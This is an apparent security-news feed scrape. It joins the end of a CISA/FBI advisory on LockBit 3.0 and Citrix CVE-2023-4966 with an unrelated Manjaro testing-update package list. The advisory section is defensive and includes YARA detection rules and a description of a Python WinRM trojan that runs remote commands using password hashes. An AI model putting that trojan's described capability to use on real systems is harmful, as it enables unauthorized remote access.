<p>description = "Detects trojan python samples"</p>
<p>sha256 = "906602ea3c887af67bcb4531bbbb459d7c24a2efcb866bcb1e3b028a51f12ae6"</p>
<p>strings:</p>
<p>$s1 = { 70 6f 72 74 20 3d 20 34 34 33 20 69 66 20 22 68 74 74 70 73 22 }</p>
<p>$s2 = { 6b 77 61 72 67 73 2e 67 65 74 28 22 68 61 73 68 70 61 73 73 77 64 22 29 3a }</p>
<p>$s3 = { 77 69 6e 72 6d 2e 53 65 73 73 69 6f 6e 20 62 61 73 69 63 20 65 72 72 6f 72 }</p>
<p>$s4 = { 57 69 6e 64 77 6f 73 63 6d 64 2e 72 75 6e 5f 63 6d 64 28 73 74 72 28 63 6d 64 29 29 }</p>
<p>condition:</p>
<p>all of them</p>
<p>}</p>
</td>
</tr></tbody></table><p>This file is a Python script called a.py that attempts to leverage WinRM to establish a session. The script attempts to authenticate to the remote machine using NT LAN Manager (NTLM) if the keyword "hashpasswd" is present. If the keyword "hashpasswd" is not present, then the script attempts to authenticate using basic authentication. Once a WinRM session is established with the remote machine, the script has the ability to execute command line arguments on the remote machine. If there is no command specified, then a default command of “whoami” is run.</p>
<h4><strong>Open Source YARA Rule</strong></h4>
<table class="MsoTableGrid"><tbody><tr><td>
<p><a><code>Import "pe" </code></a></p>
<p><code>rule M_Hunting_Backdoor_FREEFIRE </code></p>
<p><code>{</code></p>
<p><code>meta: author = "Mandiant" </code></p>
<p><code>description = "This is a hunting rule to detect FREEFIRE samples using OP code sequences in getLastRecord method"</code></p>
<p><code> md5 = "eb842a9509dece779d138d2e6b0f6949" </code></p>
<p><code>malware_family = "FREEFIRE" </code></p>
<p><code>strings: $s1 = { 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 74 ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 74 ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? ?? </code></p>
<p><code>} </code></p>
<p><code>condition: </code></p>
<p><code>uint16(0) == 0x5A4D </code></p>
<p><code>and filesize &gt;= 5KB </code></p>
<p><code>and pe.imports("mscoree.dll") </code></p>
<p><code>and all of them }</code></p>
</td>
</tr></tbody></table><h3>INCIDENT RESPONSE</h3>
<p>Organizations are encouraged to assess Citrix software and your systems for evidence of compromise, and to hunt for malicious activity (see Additional Resources section).If compromise is suspected or detected, organizations should assume that threat actors hold full administrative access and can perform all tasks associated with the web management software as well as installing malicious code.</p>
<p>If a potential compromise is detected, organizations should:</p>
<ol><li>Quarantine or take offline potentially affected hosts.</li>
<li>Reimage compromised hosts.</li>
<li>Create new account credentials.</li>
<li>Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.
<ul><li><strong>Note:</strong> Removing malicious administrator accounts may not fully mitigate risk considering threat actors may have established additional persistence mechanisms.</li>
</ul></li>
<li>Report the compromise to FBI Internet Crime Complaint Center (IC3) at IC3.gov, local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (<a href="mailto:report@cisa.gov">report@cisa.gov</a> or 888-282-0870). State, local, tribal, or territorial government (SLTT) entities can also report to MS-ISAC (<a href="mailto:SOC@cisecurity.org">SOC@cisecurity.org</a> or 866-787-4722). If outside of the US, please contact your national cyber center.</li>
</ol><h3>MITIGATIONS</h3>
<p>These mitigations apply to all critical infrastructure organizations and network defenders using Citrix NetScaler ADC and Gateway software. CISA and authoring organizations recommend that software manufacturers incorporate secure-by-design and -default principles and tactics into their software development practices to limit the impact of exploitation such as threat actors leveraging unpatched vulnerabilities within Citrix NetScaler appliances, which strengthens the security posture of their customers.</p>
<p>For more information on secure by design, see CISA’s <a href="https://www.cisa.gov/securebydesign">Secure by Design and Default</a> webpage and <a href="https://www.cisa.gov/resources-tools/resources/secure-by-design-and-default">joint guide</a>.</p>
<p>The authoring organizations of this CSA recommend organizations implement the mitigations below to improve your cybersecurity posture on the basis of the threat actor activity and to reduce the risk of compromise associated with Citrix CVE 2023-4966 and LockBit 3.0 ransomware &amp; ransomware affiliates. These mitigations align with the Cross-Sector Cybersecurity performance goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals">Cross-Sector Cybersecurity Performance Goals</a> for more information on the CPGs, including additional recommended baseline protections.</p>
<ul><li><strong>Isolate NetScaler ADC and Gateway appliances </strong>for testing until patching is ready and deployable.</li>
<li><strong>Secure remote access tools by:</strong>
<ul><li><strong>Implement application controls</strong> to manage and control the execution of software, including allowlisting remote access programs. Application controls should prevent the installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.</li>
</ul></li>
<li><strong>Strictly limit the use of RDP and other remote desktop services</strong>. If RDP is necessary, rigorously apply best practices, for example [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf">CPG 2.W</a>]:
<ul><li>Audit the network for systems using RDP.</li>
<li>Close unused RDP ports.</li>
<li>Enforce account lockouts after a specified number of attempts.</li>
<li>Apply <a href="https://www.cisa.gov/sites/default/files/publications/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf">phishing-resistant multifactor authentication (MFA)</a>.</li>
<li>Log RDP login attempts.</li>
</ul></li>
<li><strong>Restrict the use of PowerShell</strong>, using Group Policy, and only grant access to specific users on a case-by-case basis. Typically, only those users or administrators who manage the network or Windows operating systems (OSs) should be permitted to use PowerShell [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf">CPG 2.E</a>].</li>
<li><strong>Update Windows PowerShell or PowerShell Core</strong> to the latest version and uninstall all earlier PowerShell versions. Logs from Windows PowerShell prior to version 5.0 are either non-existent or do not record enough detail to aid in enterprise monitoring and incident response activities [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf">CPG 1.E, 2.S, 2.T</a>].</li>
<li><strong>Enable enhanced PowerShell logging </strong>[<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf">CPG 2.T, 2.U</a>].
<ul><li>PowerShell logs contain valuable data, including historical OS and registry interaction and possible TTPs of a threat actor’s PowerShell use.</li>
<li>Ensure PowerShell instances, using the latest version, have module, script block, and transcription logging enabled (enhanced logging).</li>
<li>The two logs that record PowerShell activity are the PowerShell Windows Event Log and the PowerShell Operational Log. FBI and CISA recommend turning on these two Windows Event Logs with a retention period of at least 180 days. These logs should be checked on a regular basis to confirm whether the log data has been deleted or logging has been turned off. Set the storage size permitted for both logs to as large as possible.</li>
</ul></li>
</ul><ul><li><strong>Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations </strong>requiring administrator privileges to reduce the risk of lateral movement by PsExec.</li>
<li><strong>Implement a recovery plan </strong>to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud).</li>
<li><strong>Require all accounts </strong>with password logins (e.g., service account, admin accounts, and domain admin accounts) to <a>comply with </a><a href="https://pages.nist.gov/800-63-3/">NIST's standards</a> for developing and managing password policies.
<ul><li>Use longer passwords consisting of at least 15 characters [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf">CPG 2.B</a>].</li>
<li>Store passwords in hashed format using industry-recognized password managers.</li>
<li>Add password user “salts” to shared login credentials.</li>
<li>Avoid reusing passwords [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf">CPG 2.C</a>].</li>
<li>Implement multiple failed login attempt account lockouts [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf">CPG 2.G</a>].</li>
<li>Disable password “hints."</li>
<li>Require administrator credentials to install software.</li>
</ul></li>
<li><strong>Keep all operating systems, software, and firmware up to date. </strong>Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Organizations should patch vulnerable software and hardware systems within 24 to 48 hours of vulnerability disclosure. Prioritize patching <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">known exploited vulnerabilities</a> in internet-facing systems [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf">CPG 1.E</a>].
<ul><li>Upgrade vulnerable NetScaler ADC and Gateway appliances to the latest version available to lower the risk of compromise.</li>
</ul></li>
</ul><h3>VALIDATE SECURITY CONTROLS</h3>
<p>In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&amp;CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&amp;CK techniques described in this advisory.</p>
<p>To get started:</p>
<ol><li>Select an ATT&amp;CK technique described in this advisory (see Table 1).</li>
<li>Align your security technologies against the technique.</li>
<li>Test your technologies against the technique.</li>
<li>Analyze your detection and prevention technologies’ performance.</li>
<li>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</li>
<li>Tune your security program, including people, processes, and technologies, based on the data generated by this process.</li>
</ol><p>CISA and the authoring organizations recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory.</p>
<h3>RESOURCES</h3>
<ul><li><a href="https://www.stopransomware.gov/">Stopransomware.gov</a> is a whole-of-government approach that gives one central location for ransomware resources and alerts.</li>
<li>The <a href="https://www.cisa.gov/resources-tools/resources/stopransomware-guide">Joint Ransomware Guide</a> provides preparation, prevention, and mitigation best practices as well as a ransomware response checklist.</li>
<li><a href="https://www.cisa.gov/cyber-hygiene-services">Cyber Hygiene Services</a> and <a href="https://github.com/cisagov/cset/releases/tag/v10.3.0.0">Ransomware Readiness Assessment</a> provide no-cost cyber hygiene and ransomware readiness assessment services.</li>
</ul><h3>REPORTING</h3>
<p>The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with LockBit 3.0 affiliates, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center (IC3) at <a href="https://www.ic3.gov/">ic3.gov</a>, <a href="https://www.fbi.gov/contact-us/field-offices">local FBI Field Office</a>, or CISA via the agency’s <a href="https://www.cisa.gov/forms/report">Incident Reporting System</a> or its 24/7 Operations Center at <a href="mailto:report@cisa.gov?subject=Ransomware%20Incident">report@cisa.gov</a> or (888) 282-0870.</p>
<h3>DISCLAIMER</h3>
<p>The information in this report is being provided “as is” for informational purposes only. CISA and authoring organizations do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and the authoring organizations.</p>
<h3>ACKNOWLEDGEMENTS</h3>
<p>Boeing contributed to this CSA.</p>
<h3>REFERENCES</h3>
<p>[1] <a href="https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967">NetScaler ADC and NetScaler Gateway Security Bulletin for CVE-2023-4966</a></p>
<p>[2] <a href="https://www.mandiant.com/resources/blog/session-hijacking-citrix-cve-2023-4966">Investigation of Session Hijacking via Citrix NetScaler ADC and Gateway Vulnerability (CVE-2023-4966</a></p>
<p><u>[3] </u><a href="https://www.mcafee.com/learn/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/">What is Mshta, How Can it Be Used and How to Protect Against it (McAfee)</a></p>
<h3>VERSION HISTORY</h3>
<p>November 21, 2023: Initial version.</p>
<p> </p>
<p> </p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2023-10-30 - Kernel 6.6, Linux-Firmware, KDE-Git, Python]]></title>
<description><![CDATA[Hello community,
Another testing branch update with some usual package updates for you.

Get the lastest SoftMaker Office with ChatGPT buillt-in. You will find our Special Offer here!
Recent News:

Manjaro, like many other open-source projects, relies on the generosity of its community through do...]]></description>
<link>https://tsecurity.de/de/1911001/unix-server/testing-update-2023-10-30-kernel-66-linux-firmware-kde-git-python/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1911001/unix-server/testing-update-2023-10-30-kernel-66-linux-firmware-kde-git-python/</guid>
<pubDate>Mon, 30 Oct 2023 15:54:33 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello community,</p>
<p>Another <strong>testing</strong> branch update with some usual package updates for you.</p>
<p><img src="https://forum.manjaro.org/uploads/default/original/3X/4/2/42e8550ce72aa8ff000d704ed0fa0a698556b13e.jpeg" alt="image" data-base62-sha1="9xThw8e1scYGHvHqifKkf1T8ODQ" width="580" height="326"><br>
<em>Get the lastest <a href="https://www.softmaker.com/en/products/softmaker-office">SoftMaker Office with ChatGPT buillt-in</a>. You will find our <a href="https://softmaker.com/go/manjaro">Special Offer here</a>!</em></p>
<p><strong>Recent News:</strong></p>
<ul>
<li>Manjaro, like many other open-source projects, relies on the generosity of its community through <a href="https://manjaro.org/donate/">donations</a> and corporate sponsorships to support its growth and development. These <a href="https://manjaro.org/donate/">donations</a> are essential in covering the various expenses incurred in the operations of the project such as server costs, software development tools, infrastructure expenses, training, flying people to events or <a href="https://blog.manjaro.org/fosdem-2023/">conferences</a> and the salaries of key developers. With the help of these donations, Manjaro is able to secure the necessary financial stability that allows the project to continuously improve and remain active. If you love Manjaro, consider to <a href="https://manjaro.org/donate/">donate</a>!</li>
</ul>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/testing-update-2023-10-30-kernel-6-6-linux-firmware-kde-git-python/150580/1">(click for more details)</a>
<p><strong>Notable Package Updates:</strong></p>
<ul>
<li>We added the final <a href="https://www.phoronix.com/news/Linux-6.6-Great-Features">6.6</a> Kernel.</li>
<li><strong>linux-firmware</strong> got renewed</li>
<li>Usual <strong>KDE-git</strong>, <strong>Haskell</strong> and <strong>Python</strong> updates</li>
</ul>
<h2><a name="additional-info-1" class="anchor" href="https://forum.manjaro.org/#additional-info-1"></a>Additional Info</h2>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2023-10-30-kernel-6-6-linux-firmware-kde-git-python/150580/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux419 4.19.297</li>
<li>linux54 5.4.259</li>
<li>linux510 5.10.199</li>
<li>linux515 5.15.137</li>
<li>linux61 6.1.60</li>
<li>linux64 6.4.16 [EOL]</li>
<li>linux65 6.5.9</li>
<li>linux66 6.6.0</li>
<li>linux61-rt 6.1.59_rt16</li>
<li>linux64-rt 6.4.6_rt8</li>
<li>linux65-rt 6.5.2_rt8</li>
</ul>
<p><strong>Package Changes</strong> (Mon Oct 30 14:50:11 CET 2023)</p>
<ul>
<li>testing core x86_64:  21 new and 21 removed package(s)</li>
<li>testing extra x86_64:  114 new and 112 removed package(s)</li>
<li>testing kde-unstable x86_64:  60 new and 58 removed package(s)</li>
<li>testing multilib x86_64:  6 new and 6 removed package(s)</li>
</ul>
<pre><code class="lang-auto">:: Different overlay package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2023-10-28           2023-10-28
-------------------------------------------------------------------------------
                           amd-ucode  20230810.7be2766d-1  20230918.3672ccab-1
                                bash            5.1.016-3            5.2.015-1
                      bashrc-manjaro            5.1.016-3            5.2.015-1
                      linux-firmware  20230810.7be2766d-1  20230918.3672ccab-1
                linux-firmware-bnx2x  20230810.7be2766d-1  20230918.3672ccab-1
             linux-firmware-liquidio  20230810.7be2766d-1  20230918.3672ccab-1
              linux-firmware-marvell  20230810.7be2766d-1  20230918.3672ccab-1
             linux-firmware-mellanox  20230810.7be2766d-1  20230918.3672ccab-1
                  linux-firmware-nfp  20230810.7be2766d-1  20230918.3672ccab-1
                 linux-firmware-qcom  20230810.7be2766d-1  20230918.3672ccab-1
               linux-firmware-qlogic  20230810.7be2766d-1  20230918.3672ccab-1
               linux-firmware-whence  20230810.7be2766d-1  20230918.3672ccab-1
                             linux66           6.6.0rc7-5              6.6.0-1
                     linux66-headers           6.6.0rc7-5              6.6.0-1


:: Different sync package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2023-10-28           2023-10-28
-------------------------------------------------------------------------------
                              dialog     1:1.3_20230209-1     1:1.3_20231002-1
                               gpgme             1.23.0-1             1.23.1-1
                                krb5             1.20.1-1             1.20.1-2
                          libnghttp2             1.57.0-1             1.58.0-1
                        python-gpgme             1.23.0-1             1.23.1-1
                          qgpgme-qt5             1.23.0-1             1.23.1-1
                          qgpgme-qt6             1.23.0-1             1.23.1-1


:: Different overlay package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2023-10-28           2023-10-28
-------------------------------------------------------------------------------
                   linux66-acpi_call           1.2.2-0.12              1.2.2-1
                    linux66-bbswitch             0.8-0.12                0.8-1
                 linux66-broadcom-wl    6.30.223.271-0.12       6.30.223.271-1
                linux66-nvidia-470xx      470.199.02-0.13         470.199.02-1
                      linux66-nvidia      535.113.01-0.11         535.113.01-1
                       linux66-r8168         8.052.01-0.9           8.052.01-1
                   linux66-rtl8723bu        20220818-0.12           20220818-1
                    linux66-tp_smapi            0.44-0.12               0.44-1
                 linux66-vhba-module        20211218-0.12           20211218-1
     linux66-virtualbox-host-modules           7.0.12-0.6             7.0.12-1
                              lutris             0.5.14-1             0.5.14-2
                linux66-nvidia-390xx                    -            390.157-1


:: Different sync package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2023-10-28           2023-10-28
-------------------------------------------------------------------------------
                             apprise              1.6.0-2              1.6.0-3
                              astyle              3.4.8-1             3.4.10-1
                               atuin             17.0.0-1             17.0.1-1
                        avogadrolibs             1.98.0-2             1.98.0-3
                    avogadrolibs-qt5             1.98.0-2             1.98.0-3
                                  b4             0.12.3-1             0.12.4-1
                               broot             1.26.1-1             1.27.0-1
                browserpass-chromium              3.7.2-2              3.8.0-1
                 browserpass-firefox              3.7.2-2              3.8.0-1
                             buildah             1.32.0-1             1.32.1-1
                 cargo-semver-checks             0.24.1-1             0.24.2-1
                        ceres-solver              2.2.0-1              2.2.0-2
                             chezmoi             2.40.3-1             2.40.4-1
                          cilium-cli            0.15.10-1            0.15.11-1
                         coin-or-cgl             0.60.8-1             0.60.8-2
                         coin-or-clp             1.17.9-1             1.17.9-2
                          coin-or-mp              1.8.4-5              1.8.4-6
                          containerd              1.7.7-1              1.7.8-1
                             ddcutil              1.4.1-1              2.0.0-1
                       deepin-daemon             6.0.23-1             6.0.23-2
             directx-shader-compiler           1.7.2212-1           1.7.2308-1
                              docker           1:24.0.6-1           1:24.0.7-1
                      docker-compose             2.22.0-1             2.23.0-1
                         endless-sky             0.10.2-1             0.10.4-1
                endless-sky-high-dpi             0.10.2-1             0.10.4-1
                    feeluown-netease              0.9.7-1              0.9.8-1
                                 fzf             0.42.0-1             0.43.0-1
                              gauche             0.9.12-1             0.9.13-1
                                giac           1.9.0.65-1           1.9.0.67-1
                           git-cliff              1.3.1-1              1.4.0-1
                               gopls             0.13.2-1             0.14.0-1
                              gpxsee               13.8-1              13.10-1
                                  hy           1:0.26.0-3           1:0.27.0-1
                               i3-wm               4.22-4               4.23-1
                             kalzium            23.08.2-1            23.08.2-2
                   krita-plugin-gmic            3.2.4.1-3            3.2.4.1-4
                             libavif              1.0.1-3              1.0.1-4
                  liblsp-r3d-glx-lib             1.2.12-1             1.2.13-1
                        libmatemixer             1.26.0-1             1.26.1-1
                      libmateweather             1.26.0-1             1.26.2-1
                            libmatio             1.5.23-3             1.5.24-1
                           libpano13             2.9.21-4             2.9.21-5
                              libxdp              1.4.0-1              1.4.1-1
                              libyuv     r2322+3aebf69d-1     r2426+464c51a0-1
                              limine       5.20231024.0-1       5.20231029.0-1
                         lsp-plugins             1.2.12-1             1.2.13-1
                    lsp-plugins-clap             1.2.12-1             1.2.13-1
                    lsp-plugins-docs             1.2.12-1             1.2.13-1
                  lsp-plugins-ladspa             1.2.12-1             1.2.13-1
                     lsp-plugins-lv2             1.2.12-1             1.2.13-1
              lsp-plugins-standalone             1.2.12-1             1.2.13-1
                     lsp-plugins-vst             1.2.12-1             1.2.13-1
                        mate-desktop             1.26.1-1             1.26.2-1
                 mate-system-monitor             1.26.0-1             1.26.1-1
                     mate-user-guide             1.26.0-1             1.26.2-1
                                naev             0.10.6-1             0.10.6-2
                            node-gyp              9.4.0-1              9.4.1-1
                              octave              8.3.0-4              8.3.0-5
                       open-vm-tools           6:12.3.0-1           6:12.3.5-1
                      openbsd-netcat            1.225_1-1            1.226_1-2
                             orbiton             2.65.2-1             2.65.3-1
                        orbiton-gtk3             2.65.2-1             2.65.3-1
                        orbiton-nano             2.65.2-1             2.65.3-1
                            owl-lisp              0.2.1-1              0.2.2-1
                                pnpm             8.10.0-1             8.10.0-2
                              podofo             0.10.1-1             0.10.2-1
                        podofo-tools             0.10.1-1             0.10.2-1
                          powerdevil             5.27.9-1             5.27.9-2
                     python-autopage              0.5.1-2              0.5.2-1
                   python-bitcoinlib             0.12.0-1             0.12.2-1
                     python-cairosvg              2.7.0-1              2.7.1-1
                 python-calmjs.parse              1.3.0-4              1.3.1-1
                       python-celery              5.3.1-1              5.3.4-1
                       python-cvxopt              1.3.2-1              1.3.2-3
                     python-identify             2.5.30-1             2.5.31-1
              python-mysql-connector              8.1.0-1              8.2.0-1
                     python-networkx                3.1-1              3.2.1-1
                      python-pikepdf              8.5.2-1              8.5.3-1
                         python-pipx              1.2.0-1              1.2.1-1
                        python-pygls              1.1.1-1              1.1.2-1
                        python-pypng             0.0.21-4       0.20231004.0-1
                                qgis             3.32.3-2             3.34.0-1
                         qutebrowser              3.0.0-1              3.0.2-1
                              rclone             1.64.0-1             1.64.2-1
                                repo               2.36-1               2.39-1
                              restic             0.16.0-1             0.16.1-1
                                 rio             0.0.25-1             0.0.26-1
                        rio-terminfo             0.0.25-1             0.0.26-1
                                sile            0.14.12-1            0.14.13-1
                         suitesparse              7.2.2-1              7.3.0-1
                                sway            1:1.8.1-1            1:1.8.1-2
                    systray-x-common              0.9.5-2              0.9.6-1
                       systray-x-kde              0.9.5-2              0.9.6-1
                   ttf-sarasa-gothic             0.42.3-1             0.42.4-1
                 ukui-control-center              3.0.4-8              3.0.4-9
                                 urh              2.9.4-4              2.9.5-1
                             utf8cpp              3.2.3-1              4.0.1-1
         v2ray-domain-list-community     20231025154305-1     20231028115119-1
                         vim-ansible                3.3-2                3.4-1
                           xdp-tools              1.4.0-1              1.4.1-1
                               yosys               0.32-1               0.34-1
                            goverlay                    -              0.9.1-3


:: Different overlay package(s) in repository kde-unstable x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2023-10-28           2023-10-28
-------------------------------------------------------------------------------
                             akonadi23.08.1.r13190.gb50106819-123.08.2.r13203.g876cc48e3-1
                    akonadi-contacts23.08.1.r3621.g48ccfbc0-123.08.2.r3632.g46031294-1
               akonadi-import-wizard23.08.1.r2017.gf6aaff8-123.08.2.r2028.gcbe7562-1
                        akonadi-mime23.08.1.r1937.ge614e6f-123.08.2.r1945.g9c1a3fc-1
                      akonadi-search23.08.1.r1484.gcdf2234-123.08.2.r1533.g92050f2-1
                           akregator23.08.1.r6857.g8c29d080-123.08.2.r6871.gb0f46085-1
                           angelfish23.08.1.r1406.g605f8dd-123.08.1.r1415.ga71eb0d-1
                        breeze-icons5.111.0.r2054.gbf0bb880-15.111.0.r2055.g27275e34-1
                     calendarsupport23.08.1.r947.gb9bc0fc-123.08.2.r953.gb96a890-1
                     grantlee-editor23.08.1.r1015.g6304592-123.08.2.r1019.g54055f9-1
                        kaddressbook23.08.1.r6519.g29436eb8-123.08.2.r6532.gbc1653e9-1
                              kalarm23.08.1.r8658.gfb3f060c-123.08.2.r8678.ge91e2568-1
                               kasts23.08.1.r1416.gcda3f72-123.08.1.r1418.g73f8f7a-1
                               kcalc23.08.1.r1782.gaa96ec6-123.08.2.r1803.g9676483-1
                        kcolorscheme5.111.0.r150.g99b0f11-15.111.0.r151.g682c58e-1
                             kconfig5.111.0.r1208.gca14f2c3-15.111.0.r1210.g968e8ae3-1
                      kconfigwidgets5.111.0.r974.g040c7261-15.111.0.r977.g218e58c1-1
                         kcoreaddons5.111.0.r1928.g93d427dc-15.111.0.r1932.gb7d9fac3-1
                          kguiaddons5.111.0.r569.g9857742-15.111.0.r569.g9857742-2
                           kholidays1:5.111.0.r1211.gb437656-11:5.111.0.r1213.gf507e22-1
                 kidentitymanagement23.08.1.r4201.g4da4e228-123.08.2.r4207.ge1c00b08-1
                                 kio5.111.0.r6651.g922667ff6-15.111.0.r6652.ge48eb2dfc-1
                     kirigami-addons1:0.11.0.r128.g52904eb-11:0.11.0.r129.gf87e863-1
                           kirigami25.111.0.r4214.g59d197a4-15.111.0.r4216.g77dd9532-1
                          kitinerary23.08.2.r3342.gd5c6e6cf-123.08.2.r3345.g654d3a2f-1
                               kmail23.08.1.r27367.gd9b35f2ea-123.08.2.r27426.gb65a1278c-1
                kmail-account-wizard23.08.1.r1062.g3bd722f-123.08.2.r1076.gd3560fd-1
                      kmailtransport23.08.1.r2035.g7fe6185-123.08.2.r2039.ge7be628-1
                              knotes23.08.1.r4046.gf76b3b82-123.08.2.r4056.g043296bc-1
                             konsole23.08.1.r9191.g2240bf301-123.08.2.r9244.ge5a0e7778-1
                             kontact23.08.1.r5852.g045dbb76-123.08.2.r5869.g79c38d23-1
                        kpimtextedit23.08.1.r2005.g2ccaf65-123.08.2.r2011.gd23e019-1
                            kservice5.111.0.r1209.gf424bd3a-15.111.0.r1209.gf424bd3a-2
                     kunitconversion5.111.0.r556.g66d8dd3-15.111.0.r557.g7506a3f-1
                             kwallet5.111.0.r1338.gd4278125-15.111.0.r1338.gd4278125-2
                      kwidgetsaddons5.111.0.r1207.g9758bab4-15.111.0.r1208.g63326b9c-1
                       kwindowsystem5.111.0.r957.g7ca140e-1                    -
                          libakonadi23.08.1.r13190.gb50106819-123.08.2.r13203.g876cc48e3-1
                         libgravatar23.08.1.r572.gbef9418-123.08.2.r577.gdf0e76f-1
                        libkmahjongg23.08.2.r576.gedf7724-123.08.2.r587.gfd478fd-1
                           libksieve23.08.1.r2086.gf259905c-123.08.2.r2093.g7b2157be-1
                          mailcommon23.08.1.r1592.g1d842a11-123.08.2.r1601.g5eadad0b-1
                        mailimporter23.08.1.r697.g48b6e00-123.08.2.r707.g51eec42-1
                       mbox-importer23.08.1.r708.gf6da84d-123.08.2.r715.ga66a0e9-1
                          messagelib23.08.1.r7508.ge80b91038-123.08.2.r7533.ge79bd6142-1
                          phonon-qt64.11.0.r103.g5a84ee4f-14.11.0.r104.g75c16847-1
                   pim-data-exporter23.08.1.r3008.g6f93a372-123.08.2.r3015.g5e158996-1
                    pim-sieve-editor23.08.1.r1878.gfbba76c-123.08.2.r1889.gd36230a-1
                           pimcommon23.08.1.r2230.gf477e40a-123.08.2.r2236.g2bf5c06c-1
                       plasma-camera  1.0.r204.ge7b80d8-1  1.0.r206.g60b9dd4-1
                  plasma-integration5.27.8.r710.g8cb13a1-15.27.9.r727.g6a1b865-1
                             purpose5.110.0.r1158.g627664d1-15.111.0.r1162.ga33d4a7b-1
                   qqc2-breeze-style5.27.8.r297.g0dc45fd-15.27.9.r299.g1594669-1
                           spectacle23.08.1.r1959.g3d1e319e-123.08.2.r2000.g398ee256-1
                 syntax-highlighting5.111.0.r2409.gb2f20119-15.111.0.r2410.gea971df1-1
                             tokodon23.08.1.r1539.g819de7ef-123.08.1.r1594.g51dff37f-1
              xdg-desktop-portal-kde5.27.8.r841.g59b6290-15.27.9.r852.gf8d7212-1
                             yakuake23.08.1.r1009.gca3b25d-123.08.2.r1039.gd1fed14-1
                                kate                    -23.08.2.r21086.g6dc7e8705-1
                  kross-interpreters                    -23.08.2.r725.gdef2cfe-1
                              kwrite                    -23.08.2.r21086.g6dc7e8705-1


:: Different sync package(s) in repository multilib x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2023-10-28           2023-10-28
-------------------------------------------------------------------------------
                        lib32-brotli             1.0.9-12              1.1.0-1
                        lib32-libdrm            2.4.116-1            2.4.117-1
